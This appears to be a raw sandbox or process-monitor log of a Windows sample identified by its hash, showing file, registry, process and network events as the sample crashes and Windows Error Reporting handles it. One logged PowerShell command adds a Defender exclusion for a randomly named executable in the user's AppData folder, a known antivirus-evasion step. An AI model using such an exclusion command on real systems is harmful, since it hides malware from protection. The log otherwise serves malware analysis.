09:33:18:680,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:680,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:788,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:788,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:788,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:866,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	PROC_exec,	C:\Windows\SysWOW64\WerFault.exe,	target_pid:8148 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' ,	0x00000000 [操作成功完成。  ],	
09:33:18:866,	WerFault.exe,	8148:0,	2928,	EXEC_create,	C:\Windows\SysWOW64\WerFault.exe,	parent_pid:8816 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' image_base:0x0000000000EF0000 image_size:0x0006F000 ,	0x00000000 [操作成功完成。  ],	
09:33:18:913,	WerFault.exe,	8148:8152,	2928,	REG_rmval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\AmiOverridePath,	keyname:'HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags' ,	0x00000000 [操作成功完成。  ],	
09:33:19:100,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp,	access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:100,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp,	,	0x00000000 [操作成功完成。  ],	
09:33:19:100,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp,	access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:100,	WerFault.exe,	8148:8152,	2928,	FILE_truncate,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp,	eof:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:19:350,	WerFault.exe,	8148:8152,	2928,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp,	offset:0x00000000 datalen:0x00000020 ,	0x00000000 [操作成功完成。  ],	
09:33:19:382,	WerFault.exe,	8148:0,	2928,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp,	,	0x00000000 [操作成功完成。  ],	
09:33:19:382,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp,	access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp,	,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml,	access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000001 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:8152,	2928,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:0,	2928,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll,	base:0x00000000742C0000 size:0x0020F000 ,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Windows\SysWOW64\drivers,	filter:'*.mrk' ,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:0,	2928,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml,	,	0x00000000 [操作成功完成。  ],	
09:33:19:413,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:413,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:413,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:413,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:431,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Windows\SysWOW64\drivers,	filter:'*.mrk' ,	0x00000000 [操作成功完成。  ],	
09:33:19:431,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp,	access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:431,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp,	,	0x00000000 [操作成功完成。  ],	
09:33:19:431,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml,	access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:444,	WerFault.exe,	8148:8152,	2928,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml,	offset:0x00000000 datalen:0x00001323 ,	0x00000000 [操作成功完成。  ],	
09:33:19:444,	WerFault.exe,	8148:0,	2928,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml,	,	0x00000000 [操作成功完成。  ],	
09:33:19:526,	WerFault.exe,	8148:5004,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:526,	WerFault.exe,	8148:5004,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:526,	WerFault.exe,	8148:5004,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:526,	WerFault.exe,	8148:5004,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:539,	WerFault.exe,	8148:984,	2928,	REG_mkkey,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData,	access:0x0002001B ,	0x00000000 [操作成功完成。  ],	
09:33:19:539,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\ClockTimeSeconds,	type:0x0000000B datalen:8 data:'DF 4A ED 64 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:19:539,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\TickCount,	type:0x0000000B datalen:8 data:'25 9E 03 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:7324,	2928,	FILE_truncate,	C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive,	eof:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:7324,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive,	offset:0x00000000 datalen:0x00000040 ,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive,	,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:7324,	2928,	FILE_truncate,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log,	eof:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:7324,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log,	offset:0x00000000 datalen:0x00000902 ,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log,	,	0x00000000 [操作成功完成。  ],	
09:33:19:820,	conhost.exe,	7172:0,	2928,	EXEC_destroy,	C:\Windows\System32\conhost.exe,	parent_pid:5080 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' ,	0x00000000 [操作成功完成。  ],	
09:33:19:820,	powershell.exe,	5080:0,	2928,	EXEC_destroy,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,	parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:20:366,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018000B6180B055,	type:0x00000003 datalen:346 data:'01 00 00 00 01 00 00 00 D0 8C 9D DF 01 15 D1 11 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:366,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\DeviceTicket,	type:0x00000003 datalen:2282 data:'01 00 00 00 01 00 00 00 D0 8C 9D DF 01 15 D1 11 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:366,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\DeviceId,	type:0x00000001 datalen:34 data:'30 30 31 38 30 30 30 42 36 31 38 30 42 30 35 35 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:366,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\ApplicationFlags,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:382,	WerFault.exe,	8148:5004,	2928,	FILE_readdir,	C:\Windows\SysWOW64\drivers,	filter:'*.mrk' ,	0x00000000 [操作成功完成。  ],	
09:33:20:475,	WerFault.exe,	8148:8004,	2928,	NET_connect,	52.168.117.173:443,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],	
09:33:20:711,	WerFault.exe,	8148:0,	2928,	NET_send,	52.168.117.173:443,	protocol:(TCP)0 datalen:195 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:945,	WerFault.exe,	8148:0,	2928,	NET_recv,	52.168.117.173:443,	protocol:(TCP)0 datalen:4380 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:945,	WerFault.exe,	8148:0,	2928,	NET_recv,	52.168.117.173:443,	protocol:(TCP)0 datalen:104 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:945,	WerFault.exe,	8148:0,	2928,	NET_send,	52.168.117.173:443,	protocol:(TCP)0 datalen:158 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:179,	WerFault.exe,	8148:0,	2928,	NET_recv,	52.168.117.173:443,	protocol:(TCP)0 datalen:51 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:179,	WerFault.exe,	8148:8004,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:179,	WerFault.exe,	8148:8004,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:179,	WerFault.exe,	8148:8004,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:179,	WerFault.exe,	8148:8004,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:194,	WerFault.exe,	8148:0,	2928,	NET_send,	52.168.117.173:443,	protocol:(TCP)0 datalen:1112 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:194,	WerFault.exe,	8148:0,	2928,	NET_send,	52.168.117.173:443,	protocol:(TCP)0 datalen:4125 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:194,	WerFault.exe,	8148:0,	2928,	NET_send,	52.168.117.173:443,	protocol:(TCP)0 datalen:836 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:819,	WerFault.exe,	8148:0,	2928,	NET_recv,	52.168.117.173:443,	protocol:(TCP)0 datalen:956 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:819,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive,	filter:'*_*_*_*_*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_484cb55c9a21365077a1c68a7b9e5e3cb2ef7722_e228f3e3_215782e1,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_6aff93876c44371897d1e8f3858937fb52c494b2_e228f3e3_250f7b02,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_776da5ffe2586954ea640af31356f08d6f957_e228f3e3_086773fd,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_95f6d93027ad781764f63e817714e23f481bb_e228f3e3_06378ac1,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_c260964a7f98f65ed93360ecba442716ad992e76_e228f3e3_27d79233,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_d09b36efc1ab823262e4447d9e591ac48e5997_e228f3e3_11bb643e,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_f84eeb62496d5a853d8f5eb857cf87ded2dac7c2_e228f3e3_253b6bfe,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.SkypeA_145397beb22a18b8f2e1ca19a6432416ebb65d7_a1837349_189e5fec,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_877cc3bf84bfd74bbcaeb9ff7ebafc9d7431acc6_d0dcfc74_182671de,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_e77e25b240783efe1581bc847cca6cdb2bdbcfc_e5c57aa7_18266c31,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.YourPh_8877c8bde7fa9a9c5de09dc7b9181a7eabfe680_3a1a0f1d_0c365e66,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_OneDrive.exe_79a15a9e6a5728ac489be495d0f32616b2ecd7_be72a7c1_09779752,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_193e9ef5,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_1f11520f,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_205ea9bf,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Procmon64.exe_c09532f9985b38eb8e45674be1656687cd9197_ed45741f_1b84066a,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3025__478811c0481f9875deb83cbacc375e7afbeb849_00000000_0a03c628,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266_e0c719d0ed7ee1aea59de04a38aa654a7c8435_00000000_12cc76cc,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266__7c8945cffcc7f3887b6b9b7e1e5517ab5968fd6f_00000000_04d90897,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266__7c8945cffcc7f3887b6b9b7e1e5517ab5968fd6f_00000000_0e873073,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_1cecfbec1fce2338d92f0fbce2327564f692bca_00000000_17b3b1ba,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_79fea5be87178577dda92ecb6203330c7841a6a_00000000_121cb425,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_c4a938beb533dfcfe565ac4db8c3e59c073d44a_00000000_0278268c,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_MicrosoftEdgeUpd_4df8dce2697bd23aa5ebc0def77646d714659a7c_00000000_18254686,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_MicrosoftEdgeUpd_7b16be7bdf552bdc43e24804272db49eab32bbd_00000000_1f4a525c,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0976b8b2,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_09779212,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_09779bf5,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0ccecc6a,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0ebde483,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_224e23fe,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_635d72ba1e42ee980484185cb023e6401bfae3_00000000_0b4486c8,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_635d72ba1e42ee980484185cb023e6401bfae3_00000000_0f6784fe,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_e85b952bb8dc9585c0b96537f30aec9168cfba_00000000_0f6780b8,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_X_c07298f5c3918c4755303fd2741546b048d9a67c_00000000_13937c31,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f,	access:0x00100001 alloc_size:0 attrib:0x00000080 share_access:0x00000003 disposition:0x00000002 options:0x00200021 ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer,	access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_chmod,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer,	attrib:0x00002080 ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:0,	2928,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer,	,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp,	,	0x00000000 [操作成功完成。  ],	
09:33:21:850,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml,	,	0x00000000 [操作成功完成。  ],	
09:33:21:850,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml,	,	0x00000000 [操作成功完成。  ],	
